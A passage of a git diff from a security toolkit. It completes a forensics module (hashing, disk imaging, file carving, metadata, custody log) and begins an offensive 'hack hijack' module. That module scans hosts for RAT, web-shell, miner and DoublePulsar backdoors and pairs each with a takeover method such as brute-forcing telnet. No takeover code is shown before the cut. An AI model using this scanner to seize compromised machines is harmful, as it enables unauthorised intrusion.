500*1024*1024}, + {'name': 'ELF', 'ext': '.elf', 'magic': b'\x7fELF', 'footer': None, 'max_size': 100*1024*1024}, + {'name': 'PE/EXE', 'ext': '.exe', 'magic': b'MZ', 'footer': None, 'max_size': 100*1024*1024}, + {'name': 'SQLite', 'ext': '.sqlite', 'magic': b'SQLite format 3\x00', 'footer': None, 'max_size': 500*1024*1024}, + {'name': 'DOCX', 'ext': '.docx', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 100*1024*1024}, + {'name': '7z', 'ext': '.7z', 'magic': b"7z\xBC\xAF'\x1C", 'footer': None, 'max_size': 500*1024*1024}, + {'name': 'BMP', 'ext': '.bmp', 'magic': b'BM', 'footer': None, 'max_size': 50*1024*1024}, + {'name': 'MP3', 'ext': '.mp3', 'magic': b'\xFF\xFB', 'footer': None, 'max_size': 50*1024*1024}, + {'name': 'MP4', 'ext': '.mp4', 'magic': b'\x00\x00\x00\x18ftyp', 'footer': None, 'max_size': 1024*1024*1024}, + {'name': 'AVI', 'ext': '.avi', 'magic': b'RIFF', 'footer': None, 'max_size': 1024*1024*1024}, +] + + +# ── Chain of Custody Logger ────────────────────────────────────────────────── + +class CustodyLog: + """Chain of custody logging for forensic evidence.""" + + def __init__(self, data_dir: str): + self.log_file = os.path.join(data_dir, 'custody_log.json') + self.entries: List[Dict] = [] + self._load() + + def _load(self): + if os.path.exists(self.log_file): + try: + with open(self.log_file) as f: + self.entries = json.load(f) + except Exception: + pass + + def _save(self): + with open(self.log_file, 'w') as f: + json.dump(self.entries, f, indent=2) + + def log(self, action: str, target: str, details: str = "", + evidence_hash: str = "") -> Dict: + """Log a forensic action.""" + entry = { + 'id': len(self.entries) + 1, + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'action': action, + 'target': target, + 'details': details, + 'evidence_hash': evidence_hash, + 'user': os.getenv('USER', os.getenv('USERNAME', 'unknown')) + } + self.entries.append(entry) + self._save() + return entry + + def get_log(self) -> List[Dict]: + return self.entries + + +# ── Forensics Engine ───────────────────────────────────────────────────────── + +class ForensicsEngine: + """Digital forensics toolkit.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'forensics') + os.makedirs(self.data_dir, exist_ok=True) + self.evidence_dir = os.path.join(self.data_dir, 'evidence') + os.makedirs(self.evidence_dir, exist_ok=True) + self.carved_dir = os.path.join(self.data_dir, 'carved') + os.makedirs(self.carved_dir, exist_ok=True) + self.custody = CustodyLog(self.data_dir) + self.dd = find_tool('dd') or shutil.which('dd') + + # ── Hash Verification ──────────────────────────────────────────────── + + def hash_file(self, filepath: str, algorithms: List[str] = None) -> Dict: + """Calculate file hashes for evidence integrity.""" + algorithms = algorithms or ['md5', 'sha1', 'sha256'] + + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + try: + hashers = {alg: hashlib.new(alg) for alg in algorithms} + file_size = os.path.getsize(filepath) + + with open(filepath, 'rb') as f: + while True: + chunk = f.read(8192) + if not chunk: + break + for h in hashers.values(): + h.update(chunk) + + hashes = {alg: h.hexdigest() for alg, h in hashers.items()} + + self.custody.log('hash_verify', filepath, + f'Hashes: {", ".join(f"{k}={v[:16]}..." for k, v in hashes.items())}', + hashes.get('sha256', '')) + + return { + 'ok': True, 'file': filepath, + 'size': file_size, 'hashes': hashes + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def verify_hash(self, filepath: str, expected_hash: str, + algorithm: str = None) -> Dict: + """Verify file against expected hash.""" + # Auto-detect algorithm from hash length + if not algorithm: + hash_len = len(expected_hash) + algorithm = {32: 'md5', 40: 'sha1', 64: 'sha256', 128: 'sha512'}.get(hash_len) + if not algorithm: + return {'ok': False, 'error': f'Cannot detect algorithm for hash length {hash_len}'} + + result = self.hash_file(filepath, [algorithm]) + if not result['ok']: + return result + + actual = result['hashes'][algorithm] + match = actual.lower() == expected_hash.lower() + + self.custody.log('hash_verify', filepath, + f'Expected: {expected_hash[:16]}... Match: {match}') + + return { + 'ok': True, 'match': match, + 'algorithm': algorithm, + 'expected': expected_hash, + 'actual': actual, + 'file': filepath + } + + # ── Disk Imaging ───────────────────────────────────────────────────── + + def create_image(self, source: str, output: str = None, + block_size: int = 4096) -> Dict: + """Create forensic disk image using dd.""" + if not self.dd: + return {'ok': False, 'error': 'dd not found'} + + if not output: + name = Path(source).name.replace('/', '_') + output = os.path.join(self.evidence_dir, f'{name}_{int(time.time())}.img') + + self.custody.log('disk_image', source, f'Creating image: {output}') + + try: + result = subprocess.run( + [self.dd, f'if={source}', f'of={output}', f'bs={block_size}', + 'conv=noerror,sync', 'status=progress'], + capture_output=True, text=True, timeout=3600 + ) + + if os.path.exists(output): + # Hash the image + hashes = self.hash_file(output, ['md5', 'sha256']) + + self.custody.log('disk_image_complete', output, + f'Image created, SHA256: {hashes.get("hashes", {}).get("sha256", "?")}') + + return { + 'ok': True, 'source': source, 'output': output, + 'size': os.path.getsize(output), + 'hashes': hashes.get('hashes', {}), + 'dd_output': result.stderr + } + return {'ok': False, 'error': 'Image file not created', 'stderr': result.stderr} + + except subprocess.TimeoutExpired: + return {'ok': False, 'error': 'Imaging timed out (1hr limit)'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── File Carving ───────────────────────────────────────────────────── + + def carve_files(self, source: str, file_types: List[str] = None, + max_files: int = 100) -> Dict: + """Recover files from raw data by magic byte signatures.""" + if not os.path.exists(source): + return {'ok': False, 'error': 'Source file not found'} + + self.custody.log('file_carving', source, f'Starting carve, types={file_types}') + + # Filter signatures + sigs = FILE_SIGNATURES + if file_types: + type_set = {t.lower() for t in file_types} + sigs = [s for s in sigs if s['name'].lower() in type_set or + s['ext'].lstrip('.').lower() in type_set] + + carved = [] + file_size = os.path.getsize(source) + chunk_size = 1024 * 1024 # 1MB chunks + + try: + with open(source, 'rb') as f: + offset = 0 + while offset < file_size and len(carved) < max_files: + f.seek(offset) + chunk = f.read(chunk_size) + if not chunk: + break + + for sig in sigs: + pos = 0 + while pos < len(chunk) and len(carved) < max_files: + idx = chunk.find(sig['magic'], pos) + if idx == -1: + break + + abs_offset = offset + idx + # Try to find file end + file_end = abs_offset + sig['max_size'] + if sig['footer']: + f.seek(abs_offset) + search_data = f.read(min(sig['max_size'], file_size - abs_offset)) + footer_pos = search_data.find(sig['footer'], len(sig['magic'])) + if footer_pos != -1: + file_end = abs_offset + footer_pos + len(sig['footer']) + + # Extract file + extract_size = min(file_end - abs_offset, sig['max_size']) + f.seek(abs_offset) + file_data = f.read(extract_size) + + # Save carved file + carved_name = f'carved_{len(carved):04d}_{sig["name"]}{sig["ext"]}' + carved_path = os.path.join(self.carved_dir, carved_name) + with open(carved_path, 'wb') as cf: + cf.write(file_data) + + file_hash = hashlib.md5(file_data).hexdigest() + carved.append({ + 'name': carved_name, + 'path': carved_path, + 'type': sig['name'], + 'offset': abs_offset, + 'size': len(file_data), + 'md5': file_hash + }) + + pos = idx + len(sig['magic']) + + offset += chunk_size - max(len(s['magic']) for s in sigs) + + self.custody.log('file_carving_complete', source, + f'Carved {len(carved)} files') + + return { + 'ok': True, 'source': source, + 'carved': carved, 'count': len(carved), + 'output_dir': self.carved_dir + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Metadata Extraction ────────────────────────────────────────────── + + def extract_metadata(self, filepath: str) -> Dict: + """Extract metadata from files (EXIF, PDF, Office, etc.).""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + ext = Path(filepath).suffix.lower() + metadata = { + 'file': filepath, + 'name': Path(filepath).name, + 'size': os.path.getsize(filepath), + 'created': datetime.fromtimestamp(os.path.getctime(filepath), timezone.utc).isoformat(), + 'modified': datetime.fromtimestamp(os.path.getmtime(filepath), timezone.utc).isoformat(), + 'accessed': datetime.fromtimestamp(os.path.getatime(filepath), timezone.utc).isoformat(), + } + + # EXIF for images + if ext in ('.jpg', '.jpeg', '.tiff', '.tif', '.png') and HAS_PIL: + try: + img = PILImage.open(filepath) + metadata['image'] = { + 'width': img.size[0], 'height': img.size[1], + 'format': img.format, 'mode': img.mode + } + exif = img._getexif() + if exif: + exif_data = {} + gps_data = {} + for tag_id, value in exif.items(): + tag = TAGS.get(tag_id, tag_id) + if tag == 'GPSInfo': + for gps_id, gps_val in value.items(): + gps_tag = GPSTAGS.get(gps_id, gps_id) + gps_data[str(gps_tag)] = str(gps_val) + else: + # Convert bytes to string for JSON serialization + if isinstance(value, bytes): + try: + value = value.decode('utf-8', errors='replace') + except Exception: + value = value.hex() + exif_data[str(tag)] = str(value) + metadata['exif'] = exif_data + if gps_data: + metadata['gps'] = gps_data + except Exception: + pass + + # PDF metadata + elif ext == '.pdf': + try: + with open(filepath, 'rb') as f: + content = f.read(4096) + # Extract info dict + for key in [b'/Title', b'/Author', b'/Subject', b'/Creator', + b'/Producer', b'/CreationDate', b'/ModDate']: + pattern = key + rb'\s*\(([^)]*)\)' + m = re.search(pattern, content) + if m: + k = key.decode().lstrip('/') + metadata.setdefault('pdf', {})[k] = m.group(1).decode('utf-8', errors='replace') + except Exception: + pass + + # Generic file header + try: + with open(filepath, 'rb') as f: + header = f.read(16) + metadata['magic_bytes'] = header.hex() + for sig in FILE_SIGNATURES: + if header.startswith(sig['magic']): + metadata['detected_type'] = sig['name'] + break + except Exception: + pass + + self.custody.log('metadata_extract', filepath, f'Type: {metadata.get("detected_type", "unknown")}') + + return {'ok': True, **metadata} + + # ── Timeline Builder ───────────────────────────────────────────────── + + def build_timeline(self, directory: str, recursive: bool = True, + max_entries: int = 10000) -> Dict: + """Build filesystem timeline from directory metadata.""" + if not os.path.exists(directory): + return {'ok': False, 'error': 'Directory not found'} + + events = [] + count = 0 + + walk_fn = os.walk if recursive else lambda d: [(d, [], os.listdir(d))] + for root, dirs, files in walk_fn(directory): + for name in files: + if count >= max_entries: + break + filepath = os.path.join(root, name) + try: + stat = os.stat(filepath) + events.append({ + 'type': 'modified', + 'timestamp': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(), + 'epoch': stat.st_mtime, + 'file': filepath, + 'size': stat.st_size + }) + events.append({ + 'type': 'created', + 'timestamp': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(), + 'epoch': stat.st_ctime, + 'file': filepath, + 'size': stat.st_size + }) + events.append({ + 'type': 'accessed', + 'timestamp': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(), + 'epoch': stat.st_atime, + 'file': filepath, + 'size': stat.st_size + }) + count += 1 + except (OSError, PermissionError): + pass + + # Sort by timestamp + events.sort(key=lambda e: e['epoch']) + + self.custody.log('timeline_build', directory, + f'{count} files, {len(events)} events') + + return { + 'ok': True, 'directory': directory, + 'events': events, 'event_count': len(events), + 'file_count': count + } + + # ── Evidence Management ────────────────────────────────────────────── + + def list_evidence(self) -> List[Dict]: + """List evidence files.""" + evidence = [] + edir = Path(self.evidence_dir) + for f in sorted(edir.iterdir()): + if f.is_file(): + evidence.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat() + }) + return evidence + + def list_carved(self) -> List[Dict]: + """List carved files.""" + carved = [] + cdir = Path(self.carved_dir) + for f in sorted(cdir.iterdir()): + if f.is_file(): + carved.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size + }) + return carved + + def get_custody_log(self) -> List[Dict]: + """Get chain of custody log.""" + return self.custody.get_log() + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_forensics() -> ForensicsEngine: + global _instance + if _instance is None: + _instance = ForensicsEngine() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Forensics module.""" + engine = get_forensics() + + while True: + print(f"\n{'='*60}") + print(f" Digital Forensics Toolkit") + print(f"{'='*60}") + print() + print(" 1 — Hash File (integrity verification)") + print(" 2 — Verify Hash") + print(" 3 — Create Disk Image") + print(" 4 — Carve Files (recover deleted)") + print(" 5 — Extract Metadata (EXIF/PDF/headers)") + print(" 6 — Build Timeline") + print(" 7 — List Evidence") + print(" 8 — List Carved Files") + print(" 9 — Chain of Custody Log") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + filepath = input(" File path: ").strip() + if filepath: + result = engine.hash_file(filepath) + if result['ok']: + print(f" Size: {result['size']} bytes") + for alg, h in result['hashes'].items(): + print(f" {alg.upper()}: {h}") + else: + print(f" Error: {result['error']}") + elif choice == '2': + filepath = input(" File path: ").strip() + expected = input(" Expected hash: ").strip() + if filepath and expected: + result = engine.verify_hash(filepath, expected) + if result['ok']: + status = 'MATCH' if result['match'] else 'MISMATCH' + print(f" {status} ({result['algorithm'].upper()})") + else: + print(f" Error: {result['error']}") + elif choice == '3': + source = input(" Source device/file: ").strip() + output = input(" Output path (blank=auto): ").strip() or None + if source: + result = engine.create_image(source, output) + if result['ok']: + mb = result['size'] / (1024*1024) + print(f" Image created: {result['output']} ({mb:.1f} MB)") + else: + print(f" Error: {result['error']}") + elif choice == '4': + source = input(" Source file/image: ").strip() + types = input(" File types (blank=all, comma-sep): ").strip() + if source: + file_types = [t.strip() for t in types.split(',')] if types else None + result = engine.carve_files(source, file_types) + if result['ok']: + print(f" Carved {result['count']} files to {result['output_dir']}") + for c in result['carved'][:10]: + print(f" {c['name']} {c['type']} {c['size']} bytes offset={c['offset']}") + else: + print(f" Error: {result['error']}") + elif choice == '5': + filepath = input(" File path: ").strip() + if filepath: + result = engine.extract_metadata(filepath) + if result['ok']: + print(f" Name: {result['name']}") + print(f" Size: {result['size']}") + print(f" Type: {result.get('detected_type', 'unknown')}") + if 'exif' in result: + print(f" EXIF entries: {len(result['exif'])}") + for k, v in list(result['exif'].items())[:5]: + print(f" {k}: {v[:50]}") + if 'gps' in result: + print(f" GPS data: {result['gps']}") + else: + print(f" Error: {result['error']}") + elif choice == '6': + directory = input(" Directory path: ").strip() + if directory: + result = engine.build_timeline(directory) + if result['ok']: + print(f" {result['file_count']} files, {result['event_count']} events") + for e in result['events'][:10]: + print(f" {e['timestamp']} {e['type']:<10} {Path(e['file']).name}") + else: + print(f" Error: {result['error']}") + elif choice == '7': + for e in engine.list_evidence(): + mb = e['size'] / (1024*1024) + print(f" {e['name']} ({mb:.1f} MB)") + elif choice == '8': + for c in engine.list_carved(): + print(f" {c['name']} ({c['size']} bytes)") + elif choice == '9': + log = engine.get_custody_log() + print(f" {len(log)} entries:") + for entry in log[-10:]: + print(f" [{entry['timestamp'][:19]}] {entry['action']}: {entry['target']}") diff --git a/modules/hack_hijack.py b/modules/hack_hijack.py new file mode 100644 index 0000000..9e9b097 --- /dev/null +++ b/modules/hack_hijack.py @@ -0,0 +1,1100 @@ +"""AUTARCH Hack Hijack Module + +Scans target systems for signs of existing compromise — open backdoors, +known exploit artifacts, rogue services, suspicious listeners — then +provides tools to take over those footholds. + +Detection signatures include: +- EternalBlue/DoublePulsar (MS17-010) backdoors +- Common RAT listeners (Meterpreter, Cobalt Strike, njRAT, etc.) +- Known backdoor ports and banner fingerprints +- Web shells on HTTP services +- Suspicious SSH authorized_keys or rogue SSHD +- Open reverse-shell listeners +- Rogue SOCKS/HTTP proxies +- Cryptocurrency miners +""" + +DESCRIPTION = "Hijack already-compromised systems" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import json +import time +import socket +import struct +import threading +import subprocess +from datetime import datetime, timezone +from pathlib import Path +from typing import Dict, List, Optional, Any +from dataclasses import dataclass, field + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + import shutil + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Known Backdoor Signatures ──────────────────────────────────────────────── + +@dataclass +class BackdoorSignature: + name: str + port: int + protocol: str # tcp / udp + banner_pattern: str = '' # regex or substring in banner + probe: bytes = b'' # bytes to send to trigger banner + description: str = '' + category: str = 'generic' # eternalblue, rat, webshell, miner, proxy, shell + takeover_method: str = '' # how to hijack + + +# Port-based detection signatures +BACKDOOR_SIGNATURES: List[BackdoorSignature] = [ + # ── EternalBlue / DoublePulsar ──────────────────────────────────────── + BackdoorSignature( + name='DoublePulsar SMB Backdoor', + port=445, + protocol='tcp', + description='NSA DoublePulsar implant via EternalBlue (MS17-010). ' + 'Detected by SMB Trans2 SESSION_SETUP anomaly.', + category='eternalblue', + takeover_method='doublepulsar_inject', + ), + + # ── Common RAT / C2 Listeners ───────────────────────────────────────── + BackdoorSignature( + name='Meterpreter Reverse TCP', + port=4444, + protocol='tcp', + banner_pattern='', + description='Default Metasploit Meterpreter reverse TCP handler.', + category='rat', + takeover_method='meterpreter_session', + ), + BackdoorSignature( + name='Meterpreter Bind TCP', + port=4444, + protocol='tcp', + banner_pattern='', + description='Metasploit bind shell / Meterpreter bind TCP.', + category='rat', + takeover_method='meterpreter_connect', + ), + BackdoorSignature( + name='Cobalt Strike Beacon (HTTPS)', + port=443, + protocol='tcp', + banner_pattern='', + description='Cobalt Strike default HTTPS beacon listener.', + category='rat', + takeover_method='beacon_takeover', + ), + BackdoorSignature( + name='Cobalt Strike Beacon (HTTP)', + port=80, + protocol='tcp', + banner_pattern='', + description='Cobalt Strike HTTP beacon listener.', + category='rat', + takeover_method='beacon_takeover', + ), + BackdoorSignature( + name='Cobalt Strike DNS', + port=53, + protocol='udp', + description='Cobalt Strike DNS beacon channel.', + category='rat', + takeover_method='dns_tunnel_hijack', + ), + BackdoorSignature( + name='njRAT', + port=5552, + protocol='tcp', + banner_pattern='njRAT', + description='njRAT default C2 port.', + category='rat', + takeover_method='generic_connect', + ), + BackdoorSignature( + name='DarkComet', + port=1604, + protocol='tcp', + banner_pattern='', + description='DarkComet RAT default port.', + category='rat', + takeover_method='generic_connect', + ), + BackdoorSignature( + name='Quasar RAT', + port=4782, + protocol='tcp', + description='Quasar RAT default listener.', + category='rat', + takeover_method='generic_connect', + ), + BackdoorSignature( + name='AsyncRAT', + port=6606, + protocol='tcp', + description='AsyncRAT default C2 port.', + category='rat', + takeover_method='generic_connect', + ), + BackdoorSignature( + name='Gh0st RAT', + port=8000, + protocol='tcp', + banner_pattern='Gh0st', + probe=b'Gh0st\x00', + description='Gh0st RAT C2 communication.', + category='rat', + takeover_method='generic_connect', + ), + BackdoorSignature( + name='Poison Ivy', + port=3460, + protocol='tcp', + description='Poison Ivy RAT default port.', + category='rat', + takeover_method='generic_connect', + ), + + # ── Shell Backdoors ─────────────────────────────────────────────────── + BackdoorSignature( + name='Netcat Listener', + port=4445, + protocol='tcp', + description='Common netcat reverse/bind shell port.', + category='shell', + takeover_method='raw_shell', + ), + BackdoorSignature( + name='Bind Shell (31337)', + port=31337, + protocol='tcp', + description='Classic "elite" backdoor port.', + category='shell', + takeover_method='raw_shell', + ), + BackdoorSignature( + name='Bind Shell (1337)', + port=1337, + protocol='tcp', + description='Common backdoor/bind shell port.', + category='shell', + takeover_method='raw_shell', + ), + BackdoorSignature( + name='Telnet Backdoor', + port=23, + protocol='tcp', + banner_pattern='login:', + description='Telnet service — often left open with weak/default creds.', + category='shell', + takeover_method='telnet_bruteforce', + ), + + # ── Web Shells ──────────────────────────────────────────────────────── + BackdoorSignature( + name='PHP Web Shell (8080)', + port=8080, + protocol='tcp', + banner_pattern='', + description='HTTP service on non-standard port — check for web shells.', + category='webshell', + takeover_method='webshell_detect', + ), + BackdoorSignature( + name='PHP Web Shell (8888)', + port=8888, + protocol='tcp', + description='HTTP service on port 8888 — common web shell host.', + category='webshell', + takeover_method='webshell_detect', + ), + + # ── Proxies / Tunnels ───────────────────────────────────────────────── + BackdoorSignature( + name='SOCKS Proxy', + port=1080, + protocol='tcp', + description='SOCKS proxy — may be a pivot point.', + category='proxy', + takeover_method='socks_connect', + ), + BackdoorSignature( + name='SOCKS5 Proxy (9050)', + port=9050, + protocol='tcp', + description='Tor SOCKS proxy or attacker pivot.', + category='proxy', + takeover_method='socks_connect', + ), + BackdoorSignature( + name='HTTP Proxy (3128)', + port=3128, + protocol='tcp', + description='Squid/HTTP proxy — possible attacker tunnel.', + category='proxy', + takeover_method='http_proxy_use', + ), + BackdoorSignature( + name='SSH Tunnel (2222)', + port=2222, + protocol='tcp', + banner_pattern='SSH-', + description='Non-standard SSH — possibly attacker-planted SSHD.', + category='shell', + takeover_method='ssh_connect', + ), + + # ── Miners ──────────────────────────────────────────────────────────── + BackdoorSignature( + name='Cryptominer Stratum', + port=3333, + protocol='tcp', + banner_pattern='mining', + description='Stratum mining protocol — cryptojacking indicator.', + category='miner', + takeover_method='miner_redirect', + ), + BackdoorSignature( + name='Cryptominer (14444)', + port=14444, + protocol='tcp', + description='Common XMR mining pool port.', + category='miner', + takeover_method='miner_redirect', + ), +] + +# Additional ports to probe beyond signature list +EXTRA_SUSPICIOUS_PORTS = [ + 1234, 1337, 2323, 3389, 4321, 4443, 4444, 4445, 5555, 5900, + 6660, 6666, 6667, 6697, 7777, 8443, 9001, 9090, 9999, + 12345, 17321, 17322, 20000, 27015, 31337, 33890, 40000, + 41337, 43210, 50000, 54321, 55553, 65535, +] + + +# ── Scan Result Types ───────────────────────────────────────────────────────── + +@dataclass +class PortResult: + port: int + protocol: str + state: str # open, closed, filtered + banner: str = '' + service: str = '' + + +@dataclass +class BackdoorHit: + signature: str # name from BackdoorSignature + port: int + confidence: str # high, medium, low + banner: str = '' + details: str = '' + category: str = '' + takeover_method: str = '' + + +@dataclass +class ScanResult: + target: str + scan_time: str + duration: float + open_ports: List[PortResult] = field(default_factory=list) + backdoors: List[BackdoorHit] = field(default_factory=list) + os_guess: str = '' + smb_info: Dict[str, Any] = field(default_factory=dict) + nmap_raw: str = '' + + def to_dict(self) -> dict: + return { + 'target': self.target, + 'scan_time': self.scan_time, + 'duration': round(self.duration, 2), + 'open_ports': [ + {'port': p.port, 'protocol': p.protocol, + 'state': p.state, 'banner': p.banner, 'service': p.service} + for p in self.open_ports + ], + 'backdoors': [ + {'signature': b.signature, 'port': b.port, + 'confidence': b.confidence, 'banner': b.banner, + 'details': b.details, 'category': b.category, + 'takeover_method': b.takeover_method} + for b in self.backdoors + ], + 'os_guess': self.os_guess, + 'smb_info': self.smb_info, + } + + +# ── Hack Hijack Service ────────────────────────────────────────────────────── + +class HackHijackService: + """Scans for existing compromises and provides takeover capabilities.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'hack_hijack') + os.makedirs(self._data_dir, exist_ok=True) + self._scans_file = os.path.join(self._data_dir, 'scans.json') + self._scans: List[dict] = [] + self._load_scans() + self._active_sessions: Dict[str, dict] = {} + + def _load_scans(self): + if os.path.exists(self._scans_file): + try: + with open(self._scans_file, 'r') as f: + self._scans = json.load(f) + except Exception: + self._scans = [] + + def _save_scans(self): + with open(self._scans_file, 'w') as f: + json.dump(self._scans[-100:], f, indent=2) # keep last 100 + + # ── Port Scanning ───────────────────────────────────────────────────── + + def scan_target(self, target: str, scan_type: str = 'quick', + custom_ports: List[int] = None, + timeout: float = 3.0, + progress_cb=None) -> ScanResult: + """Scan a target for open ports and backdoor indicators. + + scan_type: 'quick' (signature ports only), 'full' (signature + extra), + 'nmap' (use nmap if available), 'custom' (user-specified ports) + """ + start = time.time() + result = ScanResult( + target=target, + scan_time=datetime.now(timezone.utc).isoformat(), + duration=0.0, + ) + + # Build port list + ports = set() + if scan_type == 'custom' and custom_ports: + ports = set(custom_ports) + else: + # Always include signature ports + for sig in BACKDOOR_SIGNATURES: + ports.add(sig.port) + if scan_type in ('full', 'nmap'): + ports.update(EXTRA_SUSPICIOUS_PORTS) + + # Try nmap first if requested and available + if scan_type == 'nmap': + nmap_result = self._nmap_scan(target, ports, timeout) + if nmap_result: + result.open_ports = nmap_result.get('ports', []) + result.os_guess = nmap_result.get('os', '') + result.nmap_raw = nmap_result.get('raw', '') + + # Fallback: socket-based scan + if not result.open_ports: + sorted_ports = sorted(ports) + total = len(sorted_ports) + results_lock = threading.Lock() + open_ports = [] + + def scan_port(port): + pr = self._check_port(target, port, timeout) + if pr and pr.state == 'open': + with results_lock: + open_ports.append(pr) + + # Threaded scan — 50 concurrent threads + threads = [] + for i, port in enumerate(sorted_ports): + t = threading.Thread(target=scan_port, args=(port,), daemon=True) + threads.append(t) + t.start() + if len(threads) >= 50: + for t in threads: + t.join(timeout=timeout + 2) + threads.clear() + if progress_cb and i % 10 == 0: + progress_cb(i, total) + for t in threads: + t.join(timeout=timeout + 2) + + result.open_ports = sorted(open_ports, key=lambda p: p.port) + + # Match open ports against backdoor signatures + result.backdoors = self._match_signatures(target, result.open_ports, timeout) + + # Check SMB specifically for EternalBlue + if any(p.port == 445 and p.state == 'open' for p in result.open_ports): + result.smb_info = self._check_smb(target, timeout) + # Check DoublePulsar + dp_result = self._check_doublepulsar(target, timeout) + if dp_result: + result.backdoors.append(dp_result) + + result.duration = time.time() - start + + # Save scan + scan_dict = result.to_dict() + self._scans.append(scan_dict) + self._save_scans() + + return result + + def _check_port(self, host: str, port: int, timeout: float) -> Optional[PortResult]: + """TCP connect scan on a single port with banner grab.""" + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + result = sock.connect_ex((host, port)) + if result == 0: + banner = '' + service = '' + try: + # Try to grab banner + sock.settimeout(2.0) + # Send probe for known ports + probe = self._get_probe(port) + if probe: + sock.send(probe) + banner = sock.recv(1024).decode('utf-8', errors='replace').strip() + service = self._identify_service(port, banner) + except Exception: + service = self._identify_service(port, '') + sock.close() + return PortResult(port=port, protocol='tcp', state='open', + banner=banner[:512], service=service) + sock.close() + except Exception: + pass + return None + + def _get_probe(self, port: int) -> bytes: + """Return an appropriate probe for known ports.""" + probes = { + 21: b'', # FTP sends banner automatically + 22: b'', # SSH sends banner automatically + 23: b'', # Telnet sends banner automatically + 25: b'', # SMTP sends banner + 80: b'GET / HTTP/1.0\r\nHost: localhost\r\n\r\n', + 110: b'', # POP3 banner + 143: b'', # IMAP banner + 443: b'', # HTTPS — won't get plaintext banner + 3306: b'', # MySQL banner + 3389: b'', # RDP — binary protocol + 5432: b'', # PostgreSQL + 6379: b'INFO\r\n', # Redis + 8080: b'GET / HTTP/1.0\r\nHost: localhost\r\n\r\n', + 8443: b'', + 8888: b'GET / HTTP/1.0\r\nHost: localhost\r\n\r\n', + 27017: b'', # MongoDB + } + # Check backdoor signatures for specific probes + for sig in BACKDOOR_SIGNATURES: + if sig.port == port and sig.probe: + return sig.probe + return probes.get(port, b'') + + def _identify_service(self, port: int, banner: str) -> str: + """Identify service from port number and banner.""" + bl = banner.lower() + if 'ssh-' in bl: + return 'SSH' + if 'ftp' in bl: + return 'FTP' + if 'smtp' in bl or '220 ' in bl: + return 'SMTP' + if 'http' in bl: + return 'HTTP' + if 'mysql' in bl: + return 'MySQL' + if 'redis' in bl: + return 'Redis' + if 'mongo' in bl: + return 'MongoDB' + if 'postgresql' in bl: + return 'PostgreSQL' + + well_known = { + 21: 'FTP', 22: 'SSH', 23: 'Telnet', 25: 'SMTP', + 53: 'DNS', 80: 'HTTP', 110: 'POP3', 143: 'IMAP', + 443: 'HTTPS', 445: 'SMB', 993: 'IMAPS', 995: 'POP3S', + 1080: 'SOCKS', 1433: 'MSSQL', 1521: 'Oracle', + 3306: 'MySQL', 3389: 'RDP', 5432: 'PostgreSQL', + 5900: 'VNC', 6379: 'Redis', 8080: 'HTTP-Alt', + 8443: 'HTTPS-Alt', 27017: 'MongoDB', + } + return well_known.get(port, 'unknown') + + def _match_signatures(self, host: str, open_ports: List[PortResult], + timeout: float) -> List[BackdoorHit]: + """Match open ports against backdoor signatures.""" + hits = [] + port_map = {p.port: p for p in open_ports} + + for sig in BACKDOOR_SIGNATURES: + if sig.port not in port_map: + continue + port_info = port_map[sig.port] + confidence = 'low' + details = '' + + # Banner match raises confidence + if sig.banner_pattern and sig.banner_pattern.lower() in port_info.banner.lower(): + confidence = 'high' + details = f'Banner matches: {sig.banner_pattern}' + elif port_info.banner: + # Port open with some banner — medium + confidence = 'medium' + details = f'Port open, banner: {port_info.banner[:100]}' + else: + # Port open but no banner — check if it's a well-known service + if port_info.service in ('SSH', 'HTTP', 'HTTPS', 'FTP', 'SMTP', + 'DNS', 'MySQL', 'PostgreSQL', 'RDP'): + # Legitimate service likely — low confidence for backdoor + confidence = 'low' + details = f'Port open — likely legitimate {port_info.service}' + else: + confidence = 'medium' + details = 'Port open, no banner — suspicious' + + hits.append(BackdoorHit( + signature=sig.name, + port=sig.port, + confidence=confidence, + banner=port_info.banner[:256], + details=details, + category=sig.category, + takeover_method=sig.takeover_method, + )) + + return hits + + # ── SMB / EternalBlue Detection ─────────────────────────────────────── + + def _check_smb(self, host: str, timeout: float) -> dict: + """Check SMB service details.""" + info = {'vulnerable': False, 'version': '', 'os': '', 'signing': ''} + nmap = find_tool('nmap') + if not nmap: + return info + try: + cmd = [nmap, '-Pn', '-p', '445', '--script', + 'smb-os-discovery,smb-security-mode,smb-vuln-ms17-010', + '-oN', '-', host] + result = subprocess.run(cmd, capture_output=True, text=True, + timeout=30) + output = result.stdout + info['raw'] = output + if 'VULNERABLE' in output or 'ms17-010' in output.lower(): + info['vulnerable'] = True + if 'OS:' in output: + for line in output.splitlines(): + if 'OS:' in line: + info['os'] = line.split('OS:')[1].strip() + break + if 'message_signing' in output.lower(): + if 'disabled' in output.lower(): + info['signing'] = 'disabled' + elif 'enabled' in output.lower(): + info['signing'] = 'enabled' + except Exception as e: + info['error'] = str(e) + return info + + def _check_doublepulsar(self, host: str, timeout: float) -> Optional[BackdoorHit]: + """Check for DoublePulsar SMB implant via Trans2 SESSION_SETUP probe. + + DoublePulsar responds to a specific SMB Trans2 SESSION_SETUP with + a modified multiplex ID 